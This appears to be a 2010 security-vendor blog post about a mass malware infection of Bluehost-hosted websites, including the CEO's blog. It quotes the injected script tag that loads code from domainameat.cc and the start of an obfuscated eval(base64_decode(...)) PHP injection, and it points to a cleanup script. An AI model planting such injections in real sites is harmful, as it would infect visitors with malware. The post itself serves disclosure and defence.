We’re seeing that a good number of sites hosted at Bluehost have been hacked and infected with malware from domainameat.cc. The blog of Matt Heaton, CEO of Bluehost was also exploited (mattheaton.com).
After analyzing some of these sites, they were all hacked around 9/10am this morning. This is the malware script showing up at the bottom of the sites:
< script src = ” http://domainameat.cc/ js2.php “< </script>
This is the report from our scanner against their CEO’s blog:
You can see that a full directory of Spam files has been created at mattheaton.com/.files :
(domainameat.cc) which hosts the malware was just registered (Jun 25, 2010), and redirects visitors to http://www3.workfree23.net where a fake AV gets loaded:
Domain Name: DOMAINAMEAT.CC
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.MASTERHOSTINGIT.RU
Updated Date: 25-jun-2010
Creation Date: 25-jun-2010
Expiration Date: 25-jun-2011
This attack seems very similar to the one that affected GoDaddy in the recent past. All PHP files in the site get modified with a long string of base64 encoded text:
< ? php /**/ eval ( base64_decode("aWY ..oZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25
Clean up: The following script should be able to clean this up if your site got hacked: wordpress-fix.php. Just rename it to wordpress-fix.php and execute on your web site. Note that the name says wordpress-fix, but it will work for any site affected.
We’re still researching this attack and trying to determine the scale of it. If you are our client, you should already have received an alert from us if your site got hacked.
If you see any issues you think may be related, make sure to leave a comment.
If your site is hacked (or contains malware) and you need help, send us an email at firstname.lastname@example.org or visit our site: http://sucuri.net. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.